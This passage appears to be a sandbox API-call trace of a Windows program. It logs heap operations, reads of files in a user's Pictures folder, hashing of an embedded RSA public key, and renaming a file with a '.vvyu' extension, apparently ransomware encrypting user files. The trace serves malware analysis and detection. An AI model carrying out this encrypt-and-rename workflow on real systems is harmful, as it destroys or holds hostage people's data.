(HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0195.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0195.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0195.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0195.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0195.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0195.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c48 [0195.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0195.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0195.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0195.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0195.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0195.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0195.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c60 [0195.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0195.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0195.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0195.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c30 [0195.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0195.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2cc0 [0195.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0195.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c90 [0195.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c78 [0195.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0195.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2cd8 [0195.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c78 | out: hHeap=0x620000) returned 1 [0195.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c78 [0195.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c90 | out: hHeap=0x620000) returned 1 [0195.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0195.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0195.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0195.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0195.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0195.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c48 | out: hHeap=0x620000) returned 1 [0195.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c48 [0195.131] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0195.131] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea4a68 [0195.131] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ca8 | out: hHeap=0x620000) returned 1 [0195.131] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0195.131] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cd8 | out: hHeap=0x620000) returned 1 [0195.131] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea4c78 [0195.131] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0195.131] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0195.131] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0195.131] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0195.131] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c48 | out: hHeap=0x620000) returned 1 [0195.131] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea4e90 [0195.131] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0195.132] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0195.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0195.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0195.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0195.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0195.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0195.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4c78 | out: hHeap=0x620000) returned 1 [0195.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4e90 | out: hHeap=0x620000) returned 1 [0195.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0195.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0195.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c78 | out: hHeap=0x620000) returned 1 [0195.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cc0 | out: hHeap=0x620000) returned 1 [0195.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0195.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c60 | out: hHeap=0x620000) returned 1 [0195.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c30 | out: hHeap=0x620000) returned 1 [0195.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0195.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0195.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0195.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c18 | out: hHeap=0x620000) returned 1 [0195.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea12f0 | out: hHeap=0x620000) returned 1 [0195.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0195.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0195.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0195.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0195.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0195.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0195.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0195.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0195.137] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x134b1, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x134b1, lpOverlapped=0x0) returned 1 [0195.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0195.138] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x134b6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.139] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.139] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0195.139] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.139] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea4a68 [0195.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea4a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.139] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea4e98 [0195.139] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.140] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.140] WriteFile (in: hFile=0x568, lpBuffer=0x2ea4e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea4e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.140] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4e98 | out: hHeap=0x620000) returned 1 [0195.140] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.140] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.140] CloseHandle (hObject=0x568) returned 1 [0195.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2ea4a68 [0195.142] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.142] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\O_9gyTeSlm.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\o_9gyteslm.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\O_9gyTeSlm.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\o_9gyteslm.jpg.vvyu")) returned 1 [0195.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.144] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0195.147] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf543d8b0, ftCreationTime.dwHighDateTime=0x1d89974, ftLastAccessTime.dwLowDateTime=0xab531df0, ftLastAccessTime.dwHighDateTime=0x1d8a0dc, ftLastWriteTime.dwLowDateTime=0xab531df0, ftLastWriteTime.dwHighDateTime=0x1d8a0dc, nFileSizeHigh=0x0, nFileSizeLow=0x6319, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YZcqJ4cWJ.png", cAlternateFileName="YZCQJ4~1.PNG")) returned 1 [0195.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea12f0 [0195.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0195.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea12f0 | out: hHeap=0x620000) returned 1 [0195.148] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\YZcqJ4cWJ.png") returned=".png" [0195.148] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\YZcqJ4cWJ.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\yzcqj4cwj.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0195.148] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=25369) returned 1 [0195.148] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0195.151] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x62f3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.151] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0195.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.154] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.154] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x6319, lpOverlapped=0x0) returned 1 [0195.155] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0195.155] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.155] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.155] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0195.156] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0195.156] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.156] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0195.156] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0195.156] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0195.157] GetLastError () returned 0x0 [0195.157] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0195.157] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0195.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.157] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0195.157] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0195.157] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.157] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0195.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.157] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0195.157] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x6320) returned 0x2ea79b0 [0195.157] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0195.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0195.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0195.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea12f0 [0195.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c18 [0195.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1338 [0195.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c30 [0195.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c60 [0195.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cc0 [0195.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c78 [0195.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0195.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0195.159] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0195.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea4a68 [0195.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c60 | out: hHeap=0x620000) returned 1 [0195.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c78 | out: hHeap=0x620000) returned 1 [0195.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cc0 | out: hHeap=0x620000) returned 1 [0195.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0195.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cc0 [0195.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0195.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c78 [0195.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0195.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2c60 [0195.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0195.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0195.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0195.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0195.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0195.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0195.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0195.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0195.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0195.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c78 | out: hHeap=0x620000) returned 1 [0195.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c60 | out: hHeap=0x620000) returned 1 [0195.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0195.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0195.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cc0 | out: hHeap=0x620000) returned 1 [0195.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0195.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0195.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0195.163] GetCurrentThreadId () returned 0x66c [0195.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0195.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea0610 [0195.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0195.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0195.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0195.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0195.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0195.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0195.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.164] GetCurrentThreadId () returned 0x66c [0195.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0195.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.164] HeapFree (in: hHeap=0x620000, 